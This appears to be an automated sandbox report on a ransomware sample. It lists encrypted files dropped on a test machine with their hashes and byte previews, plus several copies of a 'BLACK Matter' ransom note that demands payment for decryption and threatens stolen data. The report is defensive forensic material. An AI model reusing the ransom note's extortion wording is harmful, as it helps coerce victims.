              Preview: d.......\.p..]P.T.}..H~..9,Kgh.o.Yp8.u[m...+..L.;.%..}.U.O|M;...C^..C.._.w..gy....3..I....#.A..v....f. ...C..v..i.(.C..|.b...%..>.....A....S.J....u.U,f"Tp.T8+........j....q_x..Z........$, W.q.;...M.{,......._..[c"1.....+.......b..Bt..w5.x.....P0l..eD1I=K.At.&....?IY.<.{h..o4\f.........`..X$..N..B..J...D.4.......Ng...h.....l'.a....&JJ..9.Z._.d.......#H...e#......j/.H6......D........q.........=.Q{...z..1.1Ol..@......m.4.._.?"/0....Q...eoW..8..=...<..,V....z.{...........S...{.4 ..c..kc...QC:....:...@...$"*J.j...Q.w..R(../.n@k>C.}qU...."._a.o.O*NM].z....#.....N..a...V.+..N.$@...)..>....U...Rm#a.....GG.....(....4c.X...=+O.......3.>._M#.'.j.m.v*{#..KU.g...W.K.c......i....L.c..#.-.l~.%....|.Un.j..8=v.0t.h{...kQ{.cs..+._t....Mp..v...]Y..Xr.:w...&..H..;.K.."u/O.....)'...:%\...#.S.>..W..K.zp..\i.4q.%2.p..YyL.....tFg.XB.[.2M..SFZ..$....lM..3.A?.au.d..o/..85.!:Q...P.|P..QD........S...........D}x..W...~.u.us..>S.C?G..{....$...~r.'.!.....a..F}..N......C*w@.....
              C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.jpg.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.83602414252293
              Encrypted:false
              SSDEEP:24:Gtw3WlWem8g4KFzF6xF5i4Dzf+MNRJ5N5e2LeHAdcmJQx5Jbe/KPrRMDnpm:kxlWe/q6+QNb5eOesKhPryo
              MD5:68DADF4EEE0F96BA68339AC677546604
              SHA1:4C8E4D82C5FDD7CE1BC696B9DBC6C342C8D95B9A
              SHA-256:6853615A0672B4CB49CA6A22636536AA2DF5939B7755352ABD0C663269FC8688
              SHA-512:D5E04CD78E2CD2C6369EDE607F4AAC7B47D40A6BDF63A68268BC3209F5C11029689C11B17629040BDA2393769794D391C5ED90DD243442BAA400277BAAB7EFF1
              Malicious:false
              Preview: .B...C...*.w.KB..7.`.N[N_o.8..t.k...D....XC..K....z>G.E<C..=.........wn..o....7..u.5...|...4n....]...{.4n(aNC.3`D..W<.....p..y......5..S.:b%...).6.K.....i....f..v..G..?.Rf.......4. _GY..M.......2D..9f..2...:l...!g....J.D...O...K1.RG..P.`..KE.yc....g.~k.......xE.U......`......e....@.3i|....C[..X".iH.Fi.6b.......oo~.&...cv........._...s..,N...T...U....P.I.*..u.....u.%N...3.. U(#!t}.GG..R.X^.;.n?DS5K.5.9.H...27..J[<...-.$..r.N..b..0.......k.>....m..%.....G.3...R.>.e2..<.f........H........c.\...aV3.ATD....n....! <..OjN..].k7......'..D.P>...B.`.|..EJ...)....Jhu..u[.G..|...Kb...=...|.E#.(.;v.fB.Q..E.S..<..Z..[.]D..&.d.}.....1....c.[...v...L.sX..B.L...2..L....{..d..gL...*.T..........s..7..7..y.W..-a.B..3..E.t..p......R/...t.+.../..h]u.z.O...../q G...YE.9..o..bO.8...']..(!'.r.ZO..k.X<Y..?...i..3....4i..#.\..Sl%gZ|....,.&8..GG.4f..X.:i...PX..}...+G.4|K.(.i...4.....[tly..3".P-V&^.Y.ox.........+j..r..a/Y.0...E.8N...~...,.oD..H~5...*.#...mu.....j
              C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.8183891360754885
              Encrypted:false
              SSDEEP:24:X38MGmyxQhd0NcL2hBHwwH3TJAZn1KBchCVs5jE1fWsnTOQsRPJDf9lnIs4:X3dGmdheNRHXXTaXhCVs5jE1f5CRhDlc
              MD5:57AA7D47493E6F0328068EAEF4E9F238
              SHA1:3FA36E3730514183C41A69A3847538EEE2C854E3
              SHA-256:A893C454E9F38F9EB91CC1A91BB7B381F1844E3CBC374FE9A92D777B4CBB8587
              SHA-512:57406A6B28A6E994D4BB6F1F1FFDB85AE8709FB9B00E86D9E2C02828723C1D43BDC10B5996C5DEAF31238FF3D0CB24475984913B0A913CD2FE6DDD2C46AFDAC3
              Malicious:false
              Preview: .#4L(...&D+....<...^.>8A..0].....|.&....i.`..._.jEk"..U9...*.F...K.z...iawD.+..Dk.^.`..c.wg8..?.hLD....;....Te8&...0K...~..E=J.tj.D.&. .>....b.#xz....c.....cK.......U...?...L....&....7{...g.._.w..zDgE.V..YUW+t..Z..hS.:..2jh..y..7V......s..`..k.....z.8$R.L........jm.....5u.T..~.3.k.},.+........z.6.7.t7L.4.G..h.-%Y..F............m...>......X.c..).ZT.o.:.v...8..[.....79....bV..M4....r )t..C.H.<...S.....ao...|...y..0..Qj@I[.P.e..../0/.$..k&..aN.Y...XM.t.f.S......c.-....{..k.ypO1h..T....<..{.....^a.W^<..g.MC......LR.~v0D<ody.ws, ..(_.]......""....N*.......OZ:olcR..m..=R...n#.`g....h.j.E...E^...f.'u>F......b..*(..).L..v..6\....p.Jm..(Q..o.....I..&...r..~[.d.....X.u..m......J...c..Zb..3.<......\.p.+d.;..N*..R..s*y.M.d.Q.5.-..pl..'..+.3...o....".&...o..].v.F#....i.:..:..tc...1......Q..Qv.....b.]$.O.../....!...w..D^q.5<U.t..0..K.t.I.U.....pp...F;.........9....\.{wA..I.!k...q.....-U_.s~.o..:"8s.o....h....0.jq..#}.ee..l...C}&.!...9...y.#v.
              C:\Users\user\Desktop\GAOBCVIQIJ\EFOYFBOLXA.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.838490014530486
              Encrypted:false
              SSDEEP:24:ai5+ZwF2LxgN1WIhIfGQLXbKZ4zMRw8SKMkwP++0/T:CLG7WIwjHzMRP9fL
              MD5:7E54999B7ED95E0383C6EB8540218DA6
              SHA1:689FF49EFE2660C24EE51B5307DBDE120386632C
              SHA-256:D1F0A61F573E87FF9E52DA8B0351278DD5CD74AAF3AB50BE39DB62DFFE787DD6
              SHA-512:FA0FAAC4AC09EE7B169EB1B38982B022DFD4005DC3DA9E4703603DD7407956985A876EF98C3064052F37B45DDC5B4F3393C61AB475C21A77D94F01F24BD842A7
              Malicious:false
              Preview: h.r.0g......\.>...N?.u.<i...B..k....e..AVv..O.m..b.|..n..-..=.H...@...)...@...... c.L....!.b....*7!PP..8.N|W8lJ.]...VO..P ...z.x..;...v#.......K.*..[\|....\[zu.....y......>.6.4....y.rC.H..%.m............."...)....M..8F.<..6.e.B.....f6@nue.Ihr.....R.Z].X.?....\........Z.8^~3.(..g...p&..%.4....B....o........{.}..mK.kQ...I3U0i....,..X...z...|...g..K.3.L.*/a,..?..D.A{.D....O.1..9.U..R@!..+.K.\{.`S-..Bg./..ii.....X.W....A..V)........h..-[0.z....$...T.m..M4..%......J...}....]..Y.._....^..W2.S|.G..y./_.........sKoo....8..Z.K.x....o...ZD.RC]./:.*.Z._......C..;.......e ...=(...[.3X..V..G.r/f.!!.....K..Y*..Q,.. ^...j..@~.j\.....t..#.....Dt[.......7.!...Y.e.B..=.......NqZM.L.L3..WH.......p7q.tZ.~.z]A...,.$......o...........{.P).L..p`RK....E.\...e..A..2.. .I^0....u.....7.K|?.@..Y=. ..g.>.a"y..'.A,........+K/f..w.....y.MhF.Ypn..M...@..: ..{..[xj.3cu..:.VZU.M.pG.7$.O...h.\...=.Y.7pz.a.r......+[(.k.....v....9..=.4%...K.:].....*....=...
              C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.829908844573375
              Encrypted:false
              SSDEEP:24:sx43ux12gScMWuFiMXCUGv1Uod6mxQZOucsfcaAvArJpN:Y4g2XyuFiaYMmenc+yArJP
              MD5:4275A9612898E66ED10163721DCA43D1
              SHA1:CBDC9577566CAE5A0C871A5C50236D05D0F9771B
              SHA-256:78F6CA1148195936829B20040D964767DFF69C2F249C916783C5E85944143D41
              SHA-512:573E1201AEBBCAD158BA5CDA39965EE4101CF8691AE6CBDA53483AC44E4E766B996D46DD6302F87F69A886B821D5FF83339F3EDF45757E151A674AD5AF44DAB0
              Malicious:false
              Preview: ?.,nSe....eT.C.....)........D.wJk.N...m....:'.6.p.o......[,\...X.R.N.P.AV.K^`..gW.4....3d.K....y...r...f_2,..B..P.......T.w8hh.\.I.tr..G.3..V. .-;..C.T..0...u..J..+.L24....9]U~.....M'w.|a.8W..go|.-.......L..2Q.q..@..#...]F(AI]..=..a<L:....{q5.h..=...Qx.*...4.).....h.lt.A.y.B..J.....A#}R.w....:....iK.U.H..U.,....hLt..%...Q.V.}.i.=~y...l*.M4..Nj...;?>^.e..e....~_.5.p.M.._...'f.L~+.X..D.E.a............$....8..Of_2..at_............F.l.-b(.......}..[.2.c..h.O>-.......2.z.Q..9.(P'W..%.....kI.As.8.;..c*.....=...s..<h.HO/.(Z&.....S..j..i@.\..X>.../Y.;...X.F..K..[.G.../z....x..{er....x...0`..Xq..O.L...$s..KT..aA.B......#S4u.^N{|.N(.]..1.=..oX..B..nM..$]O.>.r.s_...-0..R...N_....KF.N.Q.j .=.....Xd...d..,..B.M(a......Y..l.Ow...{.n.).=_......[.8.s..a...h..a?...2.v..N..+......!.YB8...3.qB.....F..T..6M..q.K?..g#.7..e.Mu.......).W...E(....bc.......N9....m.l%..d....|.Yyw.(..L.2..T....d-..yZGYt...;..S.....t.FvW.^.B8.6...g.~. .#Ht....;.Q..r}:..c..H.
              C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.xlsx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.831878671259605
              Encrypted:false
              SSDEEP:24:BG6muzv5D1QUlt5ZA47HAaBhwpx8D7E13TYTWiUb20BElyN86A9ICl7kjE:B99vR75+KAIe463TYFU2pPxUE
              MD5:8EC6FA6B5D294701703A592E946D60D9
              SHA1:06B4B0D65B6D10ED0A288E0131D61851BD557130
              SHA-256:44241C512C4A984D5CBA7B4863748CFB1E7E6F005B9E8E74403E1E3AFDC9C0D7
              SHA-512:4F9A70AEC3248A23AE2FC7A57855FD57AE0AD0D849BB1592FDD4102E59075D134D5070D4FA1FCFAC891C1055E76B05EC5DB23540397962E75F20881E032B5342
              Malicious:false
              Preview: ..`..q...y..._..`R.c9h.v...c+";...i..!y.eC...T.....!.....N.....1......4.afV>....XK..fy.O..Mp#^..M.....-A).....4...p..-..U2..I.-R.v.5..HN.p..X...:...f..cQ$F=o1.v.Y.h...5O#d.._&D... f...Xa.fN..0...............:j.^..(..:Uv....z_e.,5.._H.a..<a.....U-.C.Y..<.....Kq/.8J.oF........(..U..Q...c...{i..L3 .6..........v^.5\F.bmQ...k.,..ZR...J,..)S'A.+..@Jc^.../K]y..>..7.l.=...._....pYfi....a.N.Y.=..5......_..D.s...a.#.x|y..C...bB.;*s.Y.V..?..1....#3<.....b3.1...-......j.........}V...PW...b.`...\...'..a.o|..\....m;....i<I..D.BJ.,;.v"U..2.H....l....z.5m#9.l.....\..t...r....8w.....K...V.b...!?.p.....K.E..G_.G....Gj.33?....At..y.0..O.f......"..lD7..B..*..F.Z 5.T.a6.k0.h-..5.j.w.........w.yoP.:.@%x6.mN..f..,...../..n.>.......^t%X5.c.y.sn....)...A.C&Y...>......Y.....3Q1...s3>+q.w...v.l.@]...<.s..YI.8LV.5.8Q.s..t.X.[.q.......S.6.xb..$>...=...........d..:.w.7.l.,.sL17....4.......A......6..Ex.T..h....u...Q.....O7.i.f...2..QMU...5..'..TT.hO.R.a{..eo....e
              C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.832907913202546
              Encrypted:false
              SSDEEP:24:El/o9Meu9r4ncs89R/xyEFFgJQLR1ubu19Lbk1ZWiZWrift:2oHu90nDC7yVC1su19LW22l
              MD5:61112CCFDD55839AC1F93A62B5F73119
              SHA1:89BE39171E1A2BE9796C78A814E07B4A14817515
              SHA-256:7DD6638042F063FACC7EB2BC2A525C3C4391DB0DB119CB21B1B433ED4E1BD0C0
              SHA-512:E6055DC011BF5F4B8059D504A923A1F47FFB132E30A860CC9F5255046CD65066146873B53C59620A62076D65086B2526C773F22B7AE80E0A124F07EDAACAA953
              Malicious:false
              Preview: ,h..c..d.a.Q.P.....k.{..s..j....82O.l8 <.xn..E-n\.4p.hx.c....AU.....N..(.W..s.NdF..y.e~....6.f#2.d..*.}...U_..aCd.......(.j....}.G.I.S.Q.....9.}...]..G...r*d....qQ-...~.....P.;...`.[..#M.....?Z....z..J.U.TcM.6{."e..Q...i7.5e'O.8BCd.M.\t....XAk.!<){...;..b./. ._V....7../....%s(..uk..g...}.....BJ.v,.2.\u..A..t.....f....A6.d.z.%.....a._..3<..^m..3..ly$GL...t..j.c}.T8.8.......q.^..<.>r..S|.....6.rs)..t....,&.l#.2"NZ...'.E...)...{D.z ..I .F)wt......Y...F....x2.[Wo..r.Um$}A).......z.......X..[..Y..%o....^........'.$./..m......1..f.Y..;4Tp...'.G)Pk.0..Y...j...L....-..H~....D..Y.6.|b....v$X.}0/...T0^)..e;.....Go..<.,...>..C.j.5.. s.oa3..Wn...D_."UW.w$R...n...:..w....Q..R.."..7...:....PD..K,.b.z...y.W...n.L5.0..P..4...7_......:.nsN.yW..}.o.x.<....W(v.7.k./..........C..>U?Sb.-..o......1...I.S.....fe.=.p.A.....n.P.7.......-....>}.'.....~...fTU.*...}.8.........&e.j....r.........!..*~..l..$..;sd<.-...S.HO.....s~....-..o.fw..B+....D.F...2
              C:\Users\user\Desktop\GAOBCVIQIJ\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\GIGIYTFFYT\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\JDDHMPCDUJ.mp3.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.806217812914135
              Encrypted:false
              SSDEEP:24:QsjE8q4DNRbHhnhslR959Ot5RiiWAi07euJo7qM04IkToX+s12qWceeo5e:TjZq4DhhsdqSAiue7q1hkTMlDoA
              MD5:66031895B1BE34208F6C1C933AD48CEC
              SHA1:A4CDEA080805773A86B7E5B8F908F5A452C8E421
              SHA-256:6083515B2B17952003C7218BD0719D67FBBFAD7E25E9AFFEA6FC54D6406C642A
              SHA-512:B77FCDB673A46BA53EFB50FA5381891915FE1C2190B92AD511CB03CDA70220788AF9D2F7CF07054E371ABDCA60D6319D2E838D6203EB5154EE12551431AAAD2D
              Malicious:false
              Preview: %..Le.F.nJ...M....ZG*..D.w....4..Y`.......&2a...:............^........g.......|...z.\.....{..RA. JT.?Q\.?0...../..._..<S.s.0.h.m..E.%s...MK)..{7..(..?..iV`.....Q.J...g...;r....pV.G..A2.f.}.....#*...W......W"...iEU....e....C.^...a..6...LCg4E.. Ko|...k..E...M.G"...}52....m...:.Ap8...8:...J......jF"...p.@.I..5p0z.A..^*......X.E6}.......k.......n.9_....Gf.8hU?_.h...%.f...,...p.5p.lg.+...DT...7P...k...C...-......^2..r..p'X..R..8I.....L...$..V...YN....O...;..F.'......O.......$_.....j.!d..u...E...7.@3`Sh%...g.j...Q....\K.....w+..&..D)*..".i....F`|N.uVu]o;t.4.|../ ...Wk...;.WZ..e...3......*}4t.m.|D,.....H...*.0...1\xM.{.y%....'..o...IK<!;D.d....W...(7.L.....J..1...."Y..VN............j.....9......z..............*@1.bl.E...h=.......6.3..,.^......;.;L..AH..E.:t....>..]...h'..f.]""J....,XeS./......t.P..T;..9B[........r..]*..,'..]s]!s....hR......k;.oB....pWt.a]..b...B.....-Z..1.h.......p..s......7....I..\....l....u.Dh...(.k...C6.b)b...IW.i]m.7.U..a......'wy..
              C:\Users\user\Desktop\JDDHMPCDUJ\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\LFOPODGVOH\kVuoJyeoW.README.txt
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1548
              Entropy (8bit):4.479946811569468
              Encrypted:false
              SSDEEP:24:NVB4loz8mP/NA1jo66DUetcYRTxRax/ncQcPVs5V0k7jO5K3yFHsZkJP1l:V4lAnNAZo66uYNxZ1Ns8eOmyuZotl
              MD5:F66968C47A64569E2281F65A95991BE0
              SHA1:EF9E3E80BFBEA4C3021B226CB8CD00687013B8A8
              SHA-256:4B950C763006E7C4569DF8742855CEC31BF82F835BD7E2BDCB5F128DB34C82BF
              SHA-512:CB4ACE1B3E891AB100B3950C6BC133B216E91C8978A3AF1FFD75617B606BB7CEB0133F44D37A30A827655E5B84B016D736A732F5F37635BB727E1A5B722CAD24
              Malicious:false
              Preview: ~+ .. * +.. ' BLACK |.. () .-.,='``'=. - o - .. '=/_ \ | .. * | '=._ | .. \ `=./`, ' .. . '=.__.=' `=' *.. + Matter +.. O * ' .....>>> What happens?.. Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver... We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.....>>> What guarantees? .. We are not a politically motivated group and we do not need anything other than your money. .. If you pay, we will provide you the programs for decryption and we will delete your data. .. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. .. We always keep
              C:\Users\user\Desktop\LSBIHQFDVT.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.839391145262629
              Encrypted:false
              SSDEEP:24:pM35KlzCsgzSFmUMSzkVaaHHfgjqMMgDol43bHR:flgSFmU2Vag/0pY4x
              MD5:1FFE32EF69C3574535500AB0E1D2F9E4
              SHA1:26CCD9E9011E97D3DCDF6E19F419FE0284250FB3
              SHA-256:34A07A0419595D947FFA626A307174389221F65967E1275F292DEBC78158DD0C
              SHA-512:6592C80C9C88BF76EAAE89A3D0AF443E54D489C261A5F4D84CF7D3C1063297A1D20B40AAD054B84E17CD1899C13C9717B93A0C8EF47A22D958D8520000575220
              Malicious:false
              Preview: qH.7Y..:-.l.+i.q..G.[..2....._.[X.kt.x..h.W..UY.K.{.3cs]...S.g....O.....z.....x.oD])k.Q.0......}.#.!......A*).4......#Q.G."...a..%.'.....3.u..Q......H.K&....C..q`.../r.....U.P.W..|...cHu...%p.._...q.......W.S...zCz.9...L.....k...h.f.m......L.h\]o.......n...E....U...uV.'h. a...w..v..$..m.o.....F?..c...!...-....7.>P.....r..e...6.mOZ.l.z.,V.......a.......m.9...6....s...6..i..+.=.....?.Wa...6......"|.g..U.......Y.....l.._..I..3...+..x.S..S.]...5|...0.t...p...m1....n......E...-.h....KK...........c/....lzIY0.!..I.pe...e`..bi.{N.tP.)y.E63.k.<....R...C.."..i..T.h1\.T.........#.W.....@DjK.._.Y..UXO.....q.u....X..4.."s............pv..vP..8.....b...'/..l..?.o...2..r.x.,Z\......_.5b.jj.Q.]..(.p..._`..t......f.-4..&.........e....9.X/"Q..B.9OWN^.>......p.....P.'.Z7^6.'.]....*n0b..!...:.e...........^..../=`L...j.-=M..&d ]..cd..c..4nR..Bf=H\ ....hE.......@.I..P....U3..y#..'..........X.1#......G.o..TL....&....pdQ...N..x.....ps...T..t...Cm..p..K)..B..+..
              C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.841025435150955
              Encrypted:false
              SSDEEP:24:64iyq/SlUE/WO/kFCa4t8mDyfeoBvKCfAS2l1Qk:2D/qWO/kFR4SfeoBCCoz1Qk
              MD5:3F87EC45F1F16E4C082BEE87A9F354D8
              SHA1:1067A4E37B031052D7FB3304B11872C2D3DB865A
              SHA-256:0594E89CD3A050B3C184410C9FDFDDED54AFFBD213FB4288E3F9A847ACCDE0EB
              SHA-512:0324FB474CA6CCC5A940080B81D4EA1D5B5CB0B784CC9C19CF87FCAB86F04483C21A9EDBCB054EE2D5F93D290A3DB62F4653036318C361245CEADFD1323E9022
              Malicious:false
              Preview: ......3._...W.7..+.n.p.....n.T..7...X.`2....e..7...U.V...7...A.1.wC....\./...*@...h..q......Q.[..!.....4....I..]......i...1..q...PM....@....]E.....9.P5QQ... .l..>...k.z..I..&k....ne.+.m...PFtw....Z.Gr...%.b.j_%.;.QY...)p...*\kD.'...v..}...~.*9.8m...!$Y......$).C.F.v..-....8....(...1.....W*.m."|(.0.L&JYs.ap....x....lm......!u.GI.............7.F.,.'..6G._F..4.$...\..g.@D.0.g.......W..hu(O..W}......_Xi..Q..h]*.=..,jQ..k../[.IA9..*..|.X...;.]in.B$....;.1F..Z.K..#..c...7..l..{.L..\.....,.4..9z.q.!.{A....&.......e...*........4.Yr2.6q.+.H.........:.~.m0...{w..I..=...w.u...%B."..;..t.....^....L.5.n.#.....m..8.....}]...-....{..0Ny>......$z.:.@.../.8M..<.)oJ....s.y.e^.].'.........u%..?.B....@.u..XM.!.Tv.....~5P."G....S_A.h^....o.,8^....L.(...........V...C..K..0..IP.0..K.7.....w...GK....Xg.[.L...Y.V..u.c...n.....r...h!.(%.tQ6......l.m...TW:.iu.F\..}..Z...:...;...'8&.~k..2..w....p.. y.v].d...M.4.?...+m\y.a..DK....KO{.../..fF.....2m.
              C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.832199379847872
              Encrypted:false
              SSDEEP:24:yBSOxCE0Y5Z9Jrfv2mZ6V4PAImXYwk9W2eeotPKd7Xn2dTcHt6kVLtZ3F5:kAEJH2M6rfYuhcX2dPqZ37
              MD5:3CCF17C7EF5894F0CB6DB0D9B2FF1344
              SHA1:509D3AAAD7D6BB87118A1AB42D2D59E1D1B50A95
              SHA-256:572E8F715AD49E7B7A1F3147133B6C536D03E72C2FC97DC1C5D70D0BCF9C4017
              SHA-512:F0432C1DC77C71ED46E5FE962AED21039921BEB452210DE8F5C153A497197A7011C0938F840DADA42E0BACE80F9DF0389322E49EA14FEC346B8F64AEA7CB8824
              Malicious:false
              Preview: 9?..|rY)..1V......l2...U.q^.L...f...G.V.=)]-.bT.....aW]w.;.j...%;...Q..n.U..N.........){.F.....NT.r.X%..0e.`#dj..n...U/..y!XS..\.f...S..].W...s"...dZ.........i....`u.W...G.Iu.V.H...y.C\{.e.....J*...%.sT:..Eq..4<......k..p..?.D.Z:z.J%E.=f..j......~..l-.YD.U..n>..1u;..(L..[...9g...2Z./.D....#H.5s...8?#.#+...{..h.-...oP.U.B~......P.+R...!A..q.g...!.,...?. Ac.6l..2...._..w.bL...Z..$..0..........C.jS...V......t..<Zk...`7.{!...#'...s.+.}...}......9....%.B...k...:=..hZP...L.yL.8........)ujQ..`C`....L6v+.@K...uN......:.:b.e..}.T...bpG*..FC.r%..1Z\...r.0]M...k%.C.P5.`^..szl.A..E....L3.'E^.o.s.M.......f..h.....a..%......r....uX.S#|...X7..l....g...?.`_...v....N..5..6.p-..LB0&.C].du.f..Ih].....e.Z..z.<.v.h...}......T)g....Y...u...j...S(.B)...HvC.g.....;....m...(...K.pr.ZP:.....L. x...9.F.]....Ru..J..... -.q.A.y.C...;^.....to.....8...nA...|p>....v8......Z4...l..R..J.Fmns......Ls.@.).4..AB..C......@r.mNx<d.X.xp.W]......{..y=.,t...)5...Y-....G>...
              C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.png.kVuoJyeoW
              Process:C:\Users\user\Desktop\GlLHM7paoZ.exe
              File Type:data
              Category:dropped
              Size (bytes):1158
              Entropy (8bit):7.838465431962275
              Encrypted:false
              SSDEEP:24:LTZP2z/SAzAGd2shXJgnJIMDecxyZ/sabbiatoows/R1fvgVUkNPn:LTY/F7d2shSdwZsaATs/jgUkNPn
              MD5:85A1D1F6D09518CC8528CBAEC449B7EE
              SHA1:A772A41D13F9A37BC2EB81AFF3C6848A720CC0D2
              SHA-256:98FFB8730B9AABE4E6204ACECF9A5900059AD25FDDAA17A19E557259F4B91F78
              SHA-512:3B28662421F987532579BCB9BFC7D97B127D8693063E21E6E38A254326D9884FE2978C8350D6EC0A10B95D977B6823F0A014219F9613AAB327BF3B5BBE3726AC
              Malicious:false
